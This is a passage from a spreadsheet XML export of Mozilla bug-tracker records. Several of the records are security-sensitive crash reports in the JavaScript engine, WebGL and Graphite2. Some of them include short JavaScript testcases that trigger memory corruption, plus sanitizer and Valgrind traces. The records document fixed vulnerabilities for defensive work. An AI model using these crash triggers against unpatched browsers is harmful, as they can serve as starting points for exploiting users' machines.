        <v>6</v>
      </c>
      <c r="H4525" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4525" t="inlineStr">
        <is>
          <t>Firefox for Metro Graveyard</t>
        </is>
      </c>
      <c r="J4525" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K4525" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4525" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4525" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N4525" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4525" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4525" t="inlineStr">
        <is>
          <t>[block28][completed-oak] feature=story c=tbd u=tbd p=1</t>
        </is>
      </c>
      <c r="Q4525" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4525" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4525" t="inlineStr">
        <is>
          <t>Firefox 28</t>
        </is>
      </c>
      <c r="T4525" t="n">
        <v>1</v>
      </c>
      <c r="U4525" t="n">
        <v>0</v>
      </c>
      <c r="V4525" t="n">
        <v>39</v>
      </c>
      <c r="W4525" t="inlineStr">
        <is>
          <t>We have code that is not needed anymore for automatically setting up Sync in Metro Firefox, when you set it up for Desktop Firefox.  That code isn't needed anymore:
With the exception of browser/themes/windows/syncSetup.css (there is code to fix alignment there)
We should remove all of this code:
https://hg.mozilla.org/mozilla-central/rev/b855b1ac3f14
https://hg.mozilla.org/mozilla-central/rev/19eed0fb290e
https://hg.mozilla.org/mozilla-central/rev/c75172789a3c
p=1</t>
        </is>
      </c>
      <c r="X4525" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4526">
      <c r="A4526" t="n">
        <v>465980</v>
      </c>
      <c r="B4526" t="inlineStr">
        <is>
          <t>2008-11-20 09:03:41 -0800</t>
        </is>
      </c>
      <c r="C4526" t="inlineStr">
        <is>
          <t>crash in array push exceeding length limit [@ @0xffff07c7 - InitArrayElements]</t>
        </is>
      </c>
      <c r="D4526" t="inlineStr">
        <is>
          <t>2011-06-18 06:30:50 -0700</t>
        </is>
      </c>
      <c r="E4526" t="n">
        <v>1</v>
      </c>
      <c r="F4526" t="n">
        <v>1</v>
      </c>
      <c r="G4526" t="n">
        <v>3</v>
      </c>
      <c r="H4526" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4526" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4526" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4526" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4526" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4526" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4526" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4526" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4526" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4526" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4526" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4526" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T4526" t="n">
        <v>1</v>
      </c>
      <c r="U4526" t="n">
        <v>0</v>
      </c>
      <c r="V4526" t="n">
        <v>56</v>
      </c>
      <c r="W4526" t="inlineStr">
        <is>
          <t>a = new Array(4294967294);
a.push("foo", "bar);
http://crash-stats.mozilla.com/report/index/aaacb445-1390-479a-995e-1c4c20081120</t>
        </is>
      </c>
      <c r="X4526" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4527">
      <c r="A4527" t="n">
        <v>615970</v>
      </c>
      <c r="B4527" t="inlineStr">
        <is>
          <t>2010-12-01 13:04:07 -0800</t>
        </is>
      </c>
      <c r="C4527" t="inlineStr">
        <is>
          <t>Investigate if str-&gt;chars() should always clear EXTENSIBLE</t>
        </is>
      </c>
      <c r="D4527" t="inlineStr">
        <is>
          <t>2011-11-09 01:18:47 -0800</t>
        </is>
      </c>
      <c r="E4527" t="n">
        <v>1</v>
      </c>
      <c r="F4527" t="n">
        <v>1</v>
      </c>
      <c r="G4527" t="n">
        <v>3</v>
      </c>
      <c r="H4527" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4527" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4527" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4527" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4527" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4527" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4527" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4527" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4527" t="inlineStr">
        <is>
          <t>[sg:critical (on 1.9.x)] safe on trunk [qa-examined-192][qa-needs-STR]</t>
        </is>
      </c>
      <c r="Q4527" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4527" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4527" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4527" t="n">
        <v>1</v>
      </c>
      <c r="U4527" t="n">
        <v>0</v>
      </c>
      <c r="V4527" t="n">
        <v>18</v>
      </c>
      <c r="W4527" t="inlineStr">
        <is>
          <t>Currently JSString::chars() and similar methods that leaks the char array pointer do not clear the EXTENSIBLE flag assuming that the caller will do it on its own if the char array pointer must stay the same.
But that may lead to a hazard if the caller forgets to clear a flag when a script can be executed before the char array is accessed again. For example, consider the following fragment from array_toString_sub, http://hg.mozilla.org/tracemonkey/file/e5a107d91377/js/src/jsarray.cpp#l1224 :
sepstr-&gt;getCharsAndLength(sep, seplen);
...
js_GetLengthProperty(cx, obj, &amp;length)
...
cb.append(sep, seplen)
If a getter executed by js_GetLengthProperty can turn sepstr into a dependent string, then we would get a hazard as chars will point to freed memory which code then proceed to copy into a script visible memory. Note I have not verified that we have a real hazard here, but just want to give an example of code where we can have a problem.
To stop such hazards from realizing I suggest to always clear EXTENSIBLE in JSString::chars() and similar methods. If this turned out to harm some benchmarks, we can consider to add something like JSString::getVolatileChars and use it at places that affect benchmarks.</t>
        </is>
      </c>
      <c r="X4527" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4528">
      <c r="A4528" t="n">
        <v>625893</v>
      </c>
      <c r="B4528" t="inlineStr">
        <is>
          <t>2011-01-14 13:37:15 -0800</t>
        </is>
      </c>
      <c r="C4528" t="inlineStr">
        <is>
          <t>The word "English" should be translatable</t>
        </is>
      </c>
      <c r="D4528" t="inlineStr">
        <is>
          <t>2011-01-25 13:40:59 -0800</t>
        </is>
      </c>
      <c r="E4528" t="n">
        <v>1</v>
      </c>
      <c r="F4528" t="n">
        <v>1</v>
      </c>
      <c r="G4528" t="n">
        <v>5</v>
      </c>
      <c r="H4528" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4528" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4528" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K4528" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4528" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4528" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4528" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4528" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4528" t="inlineStr"/>
      <c r="Q4528" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4528" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4528" t="inlineStr">
        <is>
          <t>2.4.3</t>
        </is>
      </c>
      <c r="T4528" t="n">
        <v>1</v>
      </c>
      <c r="U4528" t="n">
        <v>0</v>
      </c>
      <c r="V4528" t="n">
        <v>6</v>
      </c>
      <c r="W4528" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.13) Gecko/20101203 Debian Firefox/3.6.13
Build Identifier: 
In strings like 
"Stop getting emailed when {locale} revisions are approved"
the word {locale} becomes "English", and so when the sentence is translated, it will contains this foreign word (for non-English-speaking people) only.
Could it be possible to substitute {locale} with plain 'English'?
Reproducible: Always</t>
        </is>
      </c>
      <c r="X4528" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4529">
      <c r="A4529" t="n">
        <v>1562294</v>
      </c>
      <c r="B4529" t="inlineStr">
        <is>
          <t>2019-06-28 12:17:24 -0700</t>
        </is>
      </c>
      <c r="C4529" t="inlineStr">
        <is>
          <t>Assertion failure: types-&gt;hasType(TypeSet::GetValueType(vp)), at js/src/jit/IonBuilder.cpp:8408</t>
        </is>
      </c>
      <c r="D4529" t="inlineStr">
        <is>
          <t>2020-12-18 17:01:27 -0800</t>
        </is>
      </c>
      <c r="E4529" t="n">
        <v>1</v>
      </c>
      <c r="F4529" t="n">
        <v>1</v>
      </c>
      <c r="G4529" t="n">
        <v>3</v>
      </c>
      <c r="H4529" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4529" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4529" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4529" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4529" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4529" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4529" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4529" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4529" t="inlineStr">
        <is>
          <t>[jsbugmon:ignore][post-critsmash-triage][adv-main70-]</t>
        </is>
      </c>
      <c r="Q4529" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4529" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4529" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T4529" t="n">
        <v>1</v>
      </c>
      <c r="U4529" t="n">
        <v>0</v>
      </c>
      <c r="V4529" t="n">
        <v>10</v>
      </c>
      <c r="W4529" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 48f71175c999+ (build with --enable-valgrind --enable-gczeal --disable-tests --enable-debug --enable-optimize, run with --fuzzing-safe --cpu-count=2 --ion-offthread-compile=off --baseline-warmup-threshold=1 --ion-warmup-threshold=0):
    let x = Object.getPrototypeOf(function*(){}).constructor;
    var t = Object.getPrototypeOf;
    monitorType(t, 1, t); t(t);
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    #0  js::jit::IonBuilder::jsop_intrinsic (this=this@entry=0x7ffff4eef238, name=&lt;optimized out&gt;) at js/src/jit/IonBuilder.cpp:8408
    #1  0x000055555632467c in js::jit::IonBuilder::inspectOpcode (this=this@entry=0x7ffff4eef238, op=op@entry=JSOP_GETINTRINSIC) at js/src/jit/IonBuilder.cpp:2224
    #2  0x00005555563259d4 in js::jit::IonBuilder::visitBlock (this=this@entry=0x7ffff4eef238, cfgblock=cfgblock@entry=0x7ffff4ef7098, mblock=&lt;optimized out&gt;) at js/src/jit/IonBuilder.cpp:1685
    #3  0x0000555556326328 in js::jit::IonBuilder::traverseBytecode (this=this@entry=0x7ffff4eef238) at js/src/jit/IonBuilder.cpp:1600
    #4  0x000055555632728e in js::jit::IonBuilder::build (this=this@entry=0x7ffff4eef238) at js/src/jit/IonBuilder.cpp:926
    #5  0x0000555556335bb2 in js::jit::IonCompile (cx=&lt;optimized out&gt;, cx@entry=0x7ffff5519000, script=&lt;optimized out&gt;, baselineFrame=baselineFrame@entry=0x0, osrPc=osrPc@entry=0x0, recompile=&lt;optimized out&gt;, optimizationLevel=&lt;optimized out&gt;) at js/src/jit/Ion.cpp:1996
    #6  0x0000555556336a62 in js::jit::Compile (cx=cx@entry=0x7ffff5519000, script=script@entry=..., osrFrame=osrFrame@entry=0x0, osrPc=osrPc@entry=0x0, forceRecompile=forceRecompile@entry=false) at js/src/jit/Ion.cpp:2294
    #7  0x0000555556336bdd in js::jit::CanEnterIon (cx=cx@entry=0x7ffff5519000, state=...) at js/src/jit/Ion.cpp:2384
    #8  0x000055555635fc66 in js::jit::MaybeEnterJit (cx=0x7ffff5519000, state=...) at js/src/jit/Jit.cpp:157
    #9  0x00005555558fb571 in Interpret (cx=0x7ffff5519000, state=...) at js/src/vm/Interpreter.cpp:3135
    #10 0x0000555555901ab6 in js::RunScript (cx=0x7ffff5519000, state=...) at js/src/vm/Interpreter.cpp:425
    [...]
    #19 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:11367
    rax	0x555557dd9160	93825034719584
    rbx	0x7ffff4eef238	140737302688312
    rcx	0x555556cebba8	93825016970152
    rdx	0x0	0
    rsi	0x7ffff6e528b0	140737335601328
    rdi	0x7ffff6e51680	140737335596672
    rbp	0x7fffffffc660	140737488340576
    rsp	0x7fffffffc620	140737488340512
    r8	0x7ffff6e528b0	140737335601328
    r9	0x7ffff7fd2d00	140737353952512
    r10	0x9	9
    r11	0x7ffff6ae37e0	140737332000736
    r12	0x7fffffffc628	140737488340520
    r13	0x7ffff4eef568	140737302689128
    r14	0x21a3236289a0	36984557046176
    r15	0x7fffffffc730	140737488340784
    rip	0x5555562ea809 &lt;js::jit::IonBuilder::jsop_intrinsic(js::PropertyName*)+969&gt;
    =&gt; 0x5555562ea809 &lt;js::jit::IonBuilder::jsop_intrinsic(js::PropertyName*)+969&gt;:	movl   $0x0,0x0
       0x5555562ea814 &lt;js::jit::IonBuilder::jsop_intrinsic(js::PropertyName*)+980&gt;:	ud2
This test requires the new testing function "monitorType" added by the patch in bug 1560070. Marking s-s because tests found with this function can indicate pre-existing problems in JIT type inference.</t>
        </is>
      </c>
      <c r="X4529" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4530">
      <c r="A4530" t="n">
        <v>723446</v>
      </c>
      <c r="B4530" t="inlineStr">
        <is>
          <t>2012-02-02 03:01:03 -0800</t>
        </is>
      </c>
      <c r="C4530" t="inlineStr">
        <is>
          <t>Access to a keyframe's cssText after dynamic modification always crashes Gecko</t>
        </is>
      </c>
      <c r="D4530" t="inlineStr">
        <is>
          <t>2013-01-31 20:16:29 -0800</t>
        </is>
      </c>
      <c r="E4530" t="n">
        <v>1</v>
      </c>
      <c r="F4530" t="n">
        <v>1</v>
      </c>
      <c r="G4530" t="n">
        <v>3</v>
      </c>
      <c r="H4530" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4530" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4530" t="inlineStr">
        <is>
          <t>DOM: CSS Object Model</t>
        </is>
      </c>
      <c r="K4530" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4530" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4530" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4530" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4530" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4530" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q4530" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4530" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4530" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T4530" t="n">
        <v>1</v>
      </c>
      <c r="U4530" t="n">
        <v>0</v>
      </c>
      <c r="V4530" t="n">
        <v>23</v>
      </c>
      <c r="W4530" t="inlineStr">
        <is>
          <t>The following test modifies a keyframe through JS and then reads its cssText
twice. Gecko will always crash, sometimes at first read, sometimes at second:
  http://glazman.org/tmp/cssanim_bug.html
Verified on OS X and Linux 32bits with 12.0a1.
Related crash reports:
  bp-7624db3c-492f-42f1-9364-e2f132120202
  bp-8eaecc4f-b4f1-4b5c-870c-b235b2120202
  bp-9c64754f-0056-48eb-936f-0f4a62120202
  bp-4237d936-28e5-4f62-8a00-f5d9c2120202
  bp-9c32ddbf-211f-4d7d-9897-448002120202
This bug blocks the CSS Animations' editor I am currently working on for
BlueGriffon.</t>
        </is>
      </c>
      <c r="X4530" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4531">
      <c r="A4531" t="n">
        <v>1743767</v>
      </c>
      <c r="B4531" t="inlineStr">
        <is>
          <t>2021-12-01 01:15:19 -0800</t>
        </is>
      </c>
      <c r="C4531" t="inlineStr">
        <is>
          <t>heap-buffer-overflow in mozilla::gl::GLContext::raw_fReadPixels</t>
        </is>
      </c>
      <c r="D4531" t="inlineStr">
        <is>
          <t>2024-05-30 10:51:44 -0700</t>
        </is>
      </c>
      <c r="E4531" t="n">
        <v>1</v>
      </c>
      <c r="F4531" t="n">
        <v>1</v>
      </c>
      <c r="G4531" t="n">
        <v>3</v>
      </c>
      <c r="H4531" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4531" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4531" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K4531" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4531" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4531" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4531" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4531" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4531" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main101+][adv-esr91.10+]</t>
        </is>
      </c>
      <c r="Q4531" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4531" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4531" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T4531" t="n">
        <v>1</v>
      </c>
      <c r="U4531" t="n">
        <v>0</v>
      </c>
      <c r="V4531" t="n">
        <v>30</v>
      </c>
      <c r="W4531" t="inlineStr">
        <is>
          <t>Created attachment 9253176
heap-buffer-overflow-mozilla-glGLContextraw_fReadPixels.html
Tested on:
    OS: Ubuntu 20.04 in VMware VM
    Firefox: 
```
fuzzfetch --target firefox --os Linux --asan --fuzzing -n firefox
[2021-12-01 10:14:05] Identified task: https://firefox-ci-tc.services.mozilla.com/api/index/v1/task/gecko.v2.mozilla-central.latest.firefox.linux64-fuzzing-asan-opt
[2021-12-01 10:14:05] &gt; Task ID: Frxzk0u7Qeu4nG7rilMWAQ
[2021-12-01 10:14:05] &gt; Rank: 1638335107
[2021-12-01 10:14:05] &gt; Changeset: 89800efd9e5cfcf0146767961a63d5c4e2a86e2c
[2021-12-01 10:14:05] &gt; Build ID: 20211201050507
[2021-12-01 10:14:05] &gt; Downloading: https://firefox-ci-tc.services.mozilla.com/api/queue/v1/task/Frxzk0u7Qeu4nG7rilMWAQ/artifacts/public/build/target.tar.bz2 (382.95MiB total)
```
prefs.js: fuzzing prefs.js generated with prefpicker, adding as an attachment.
I have reproduced the issue on my machine with/without the fuzzing prefs.js, and with/without Xvfb . Including prefs.js as an attachment to ensure reproducibility.
The write size can be changed by changing the canvas width. For example changing width and 300px, the write will be size 1200, 10px and it will be 40. 1px on fuzzfetch --fuzzing build will result to a 
```
Hit MOZ_CRASH(Trying to run a non-debug fuzzing build.) at /builds/worker/checkouts/gecko/third_party/rust/neqo-crypto/src/aead_fuzzing.rs:19
```
I don't think it is related to the issue. Using 1px with regular asan-build downloaded without `--fuzzing` doesn't crash, but other tested values 10px up reproduced sameway on regular and fuzzing builds.  
Reproducing:
```
$ ffpuppet -p ~/prefs.js -u ./heap-buffer-overflow-mozilla-glGLContextraw_fReadPixels.html ./firefox/firefox --xvfb -d
[2021-12-01 10:37:01] Launching Firefox...
[2021-12-01 10:37:13] Running Firefox (pid: 16680)...
[2021-12-01 10:37:14] Shutting down...
[2021-12-01 10:37:16] Firefox process is closed. (Reason: &lt;Reason.ALERT: 0&gt;)
[2021-12-01 10:37:16] Displaying logs...
===
=== Dumping 'log_ffp_asan_16655.log.16807.txt' (14.89KB)
===
=================================================================
==16807==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f59218c8c00 at pc 0x55ee081ba203 bp 0x7fff0cc77200 sp 0x7fff0cc769c0
WRITE of size 1600 at 0x7f59218c8c00 thread T0 (file:// Content)
    #0 0x55ee081ba202 in __interceptor_memcpy /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:827:5
```
ASAN-trace(truncated, full trace as an attachment):
```
==16807==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f59218c8c00 at pc 0x55ee081ba203 bp 0x7fff0cc77200 sp 0x7fff0cc769c0
WRITE of size 1600 at 0x7f59218c8c00 thread T0 (file:// Content)
    #0 0x55ee081ba202 in __interceptor_memcpy /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:827:5
    #1 0x7f59333e3ef8  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x320ef8)
    #2 0x7f59332997fc  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x1d67fc)
    #3 0x7f59333e42dc  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x3212dc)
    #4 0x7f59333e4b15  (/usr/lib/x86_64-linux-gnu/dri/swrast_dri.so+0x321b15)
    #5 0x7f59c93ecd70 in mozilla::gl::GLContext::raw_fReadPixels(int, int, int, int, unsigned int, unsigned int, void*) /builds/worker/workspace/obj-build/dist/include/GLContext.h:1568:5
    #6 0x7f59cc103cb1 in mozilla::WebGLContext::DoReadPixelsAndConvert(mozilla::webgl::FormatInfo const*, mozilla::webgl::ReadPixelsDesc const&amp;, unsigned long, unsigned long, unsigned int) /builds/worker/checkouts/gecko/dom/canvas/WebGLContextGL.cpp
    #7 0x7f59cc106190 in mozilla::WebGLContext::ReadPixelsImpl(mozilla::webgl::ReadPixelsDesc const&amp;, unsigned long, unsigned long) /builds/worker/checkouts/gecko/dom/canvas/WebGLContextGL.cpp:1238:7
    #8 0x7f59cc1041a7 in mozilla::WebGLContext::ReadPixelsInto(mozilla::webgl::ReadPixelsDesc const&amp;, mozilla::Range&lt;unsigned char&gt; const&amp;) /builds/worker/checkouts/gecko/dom/canvas/WebGLContextGL.cpp:962:10
    #9 0x7f59cbfe89b4 in mozilla::HostWebGLContext::ReadPixelsInto(mozilla::webgl::ReadPixelsDesc const&amp;, mozilla::Range&lt;unsigned char&gt; const&amp;) const /builds/worker/checkouts/gecko/dom/canvas/HostWebGLContext.h:646:22
...
    #53 0x55ee08252dfd in content_process_main(mozilla::Bootstrap*, int, char**) /builds/worker/checkouts/gecko/browser/app/../../ipc/contentproc/plugin-container.cpp:57:28
    #54 0x55ee08253228 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:327:18
    #55 0x7f59e54b50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #56 0x55ee081a1ec9 in _start (/firefox/firefox+0x5cec9)
0x7f59218c8c00 is located 0 bytes to the right of 640000-byte region [0x7f592182c800,0x7f59218c8c00)
allocated by thread T0 (file:// Content) here:
    #0 0x55ee0821e632 in __interceptor_calloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:138:3
    #1 0x7f59d39151cb in AllocateArrayBufferContents /builds/worker/checkouts/gecko/js/src/vm/ArrayBufferObject.cpp:459:11
    #2 0x7f59d39151cb in std::tuple&lt;js::ArrayBufferObject*, unsigned char*&gt; js::ArrayBufferObject::createBufferAndData&lt;(js::ArrayBufferObject::FillContents)0&gt;(JSContext*, unsigned long, js::AutoSetNewObjectMetadata&amp;, JS::Handle&lt;JSObject*&gt;) /builds/worker/checkouts/gecko/js/src/vm/ArrayBufferObject.cpp:1351:18
    #3 0x7f59d390ceea in js::ArrayBufferObject::createZeroed(JSContext*, unsigned long, JS::Handle&lt;JSObject*&gt;) /builds/worker/checkouts/gecko/js/src/vm/ArrayBufferObject.cpp:1414:7
...
    #22 0x7f59ce5744aa in mozilla::dom::ScriptElement::MaybeProcessScript() /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:118:18
    #23 0x7f59c91a2d6e in nsIScriptElement::AttemptToExecute() /builds/worker/workspace/obj-build/dist/include/nsIScriptElement.h:211:18
SUMMARY: AddressSanitizer: heap-buffer-overflow /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:827:5 in __interceptor_memcpy
Shadow bytes around the buggy address:
...
==16807==ABORTING
```</t>
        </is>
      </c>
      <c r="X4531" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4532">
      <c r="A4532" t="n">
        <v>1350047</v>
      </c>
      <c r="B4532" t="inlineStr">
        <is>
          <t>2017-03-23 12:38:31 -0700</t>
        </is>
      </c>
      <c r="C4532" t="inlineStr">
        <is>
          <t>Graphite2: out of bounds read [@ graphite2::Pass::readPass]</t>
        </is>
      </c>
      <c r="D4532" t="inlineStr">
        <is>
          <t>2017-10-26 19:20:19 -0700</t>
        </is>
      </c>
      <c r="E4532" t="n">
        <v>1</v>
      </c>
      <c r="F4532" t="n">
        <v>1</v>
      </c>
      <c r="G4532" t="n">
        <v>3</v>
      </c>
      <c r="H4532" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4532" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4532" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K4532" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4532" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4532" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4532" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4532" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4532" t="inlineStr">
        <is>
          <t>[gfx-noted][post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q4532" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4532" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4532" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T4532" t="n">
        <v>1</v>
      </c>
      <c r="U4532" t="n">
        <v>0</v>
      </c>
      <c r="V4532" t="n">
        <v>18</v>
      </c>
      <c r="W4532" t="inlineStr">
        <is>
          <t>Created attachment 8850653
test_case.ttf
Found with a 32bit build running gr2FontTest.
Invalid read of size 1
   at 0x807EBDD: _peek&lt;1&gt; (Endian.h:77)
   by 0x807EBDD: read&lt;unsigned char&gt; (Endian.h:60)
   by 0x807EBDD: graphite2::Pass::readPass(unsigned char const*, unsigned int, unsigned int, graphite2::Face&amp;, graphite2::passtype, unsigned int, graphite2::Error&amp;) (Pass.cpp:102)
   by 0x80650B2: graphite2::Silf::readGraphite(unsigned char const*, unsigned int, graphite2::Face&amp;, unsigned int) (Silf.cpp:216)
   by 0x80555B7: graphite2::Face::readGraphite(graphite2::Face::Table const&amp;) (Face.cpp:149)
   by 0x804EF04: (anonymous namespace)::load_face(graphite2::Face&amp;, unsigned int) (gr_face.cpp:59)
   by 0x804FCE8: gr_make_face_with_ops (gr_face.cpp:89)
   by 0x804FCE8: gr_make_file_face (gr_face.cpp:242)
   by 0x804C77A: Parameters::testFileFont() const (gr2FontTest.cpp:639)
   by 0x804D936: main (gr2FontTest.cpp:798)
 Address 0xe3406f0a is not stack'd, malloc'd or (recently) free'd
Process terminating with default action of signal 11 (SIGSEGV)
 Access not within mapped region at address 0xE3406F0A
   at 0x807EBDD: _peek&lt;1&gt; (Endian.h:77)
   by 0x807EBDD: read&lt;unsigned char&gt; (Endian.h:60)
   by 0x807EBDD: graphite2::Pass::readPass(unsigned char const*, unsigned int, unsigned int, graphite2::Face&amp;, graphite2::passtype, unsigned int, graphite2::Error&amp;) (Pass.cpp:102)
